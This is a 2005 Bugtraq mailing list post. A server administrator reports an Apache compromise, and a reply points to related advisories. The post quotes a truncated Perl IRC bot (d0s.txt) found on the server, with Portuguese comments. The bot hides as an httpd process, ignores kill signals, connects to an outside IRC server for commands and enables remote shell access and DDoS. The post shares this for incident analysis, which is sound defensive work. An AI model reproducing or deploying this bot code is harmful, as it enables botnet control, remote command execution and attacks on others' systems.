|
Bugtraq
mailing list archives
Re: Apache hacks (./atac, d0s.txt)
From: Daniel Cid <danielcid () yahoo com br>
Date: Sat, 30 Apr 2005 01:48:12 -0300 (ART)
Take a look at these links:
http://lists.virus.org/full-disclosure-0412/msg00541.html
http://seclists.org/lists/fulldisclosure/2005/Jan/0051.html
Are your systems patched (apache) ? Do you run any
application that might be vulnerable?
One thing I know is that this perl script is crearly
made by some brazilian people..
--
Daniel B. Cid, CISSP
daniel.cid @ ( at ) gmail.com
--- Andrew Y Ng <ayn () AndrewNg com> escreveu:
My server has been seeing some usual activities
today, I don't have much time
to get down to the bottom of things, but after I
investigated briefly I have
decided to disable PERL executable permission for
www-data (Apache process's
user), also locked /var/tmp so www-data cannot write
to it.
Looks like it ignores all the `kill` signals, not
sure how I can actually
kill it...
I found the included script in /var/tmp called
d0s.txt.
I found a bunch of processes called ./atac 20
running, and found the
following content in /tmp/atac:
http://andrewng.com/tmp/atac.tbz
here's d0s.txt:
#!/usr/bin/perl
################ CONFIGURACAO
#################################################################
my $processo = '/usr/local/apache/bin/httpd -DSSL';
# Nome do processo que vai aparece no ps #
#----------------------------------------------################################################
my $MODOME='+pi'; #
Modo Do Bot #
#----------------------------------------------################################################
my $linas_max='10'; #
Evita o flood :) depois de X linhas #
#----------------------------------------------################################################
my $sleep='3'; # ele
dorme X segundos #
##################### IRC
#####################################################################
my @adms=("DDOS"); # Nick do
administrador #
#----------------------------------------------################################################
my @canais=("#bots ddos");# Canais
#
#----------------------------------------------################################################
my $nick='b0t'; # Nick do
bot. Caso esteja em uso vai aparecer #
# #
aparecer com numero radonamico no final #
#----------------------------------------------################################################
my $ircname = 'b0t'; # User ID
#
#----------------------------------------------################################################
my $realname = '��4A�dmin�14: �4��#��D�D�OS��';
#
#----------------------------------------------################################################
$servidor='irc.gigachat.net' unless $servidor; #
Servidor de irc que vai ser usado #
# #
caso não seja especificado no argumento #
#----------------------------------------------################################################
my $porta='6667'; # Porta do
servidor de irc #
################ ACESSO A SHELL
###############################################################
my $secv = 1; # 1/0
pra habilita/desabilita acesso a shell #
###############################################################################################
my $VERSAO = '1.0';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket =
IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or
return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} =
"$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} =
"$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} =
$meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} =
$IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname
".$IRC_socket->sockhost." $servidor_con
:$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick",
"$servidor", "$porta"); }
delete($irc_servers{''}) if
(defined($irc_servers{''}));
&DCC::connections;
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick =
$irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH
:\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)
PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001Bot powered by DDOS
TEAM\001");
}
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\!bot)\s+(.*)/
) {
=== message truncated ===
Yahoo! Acesso Grátis - Internet rápida e grátis.
Instale o discador agora! http://br.acesso.yahoo.com/
 By Date 
By Thread
Current thread:
| 
Intro
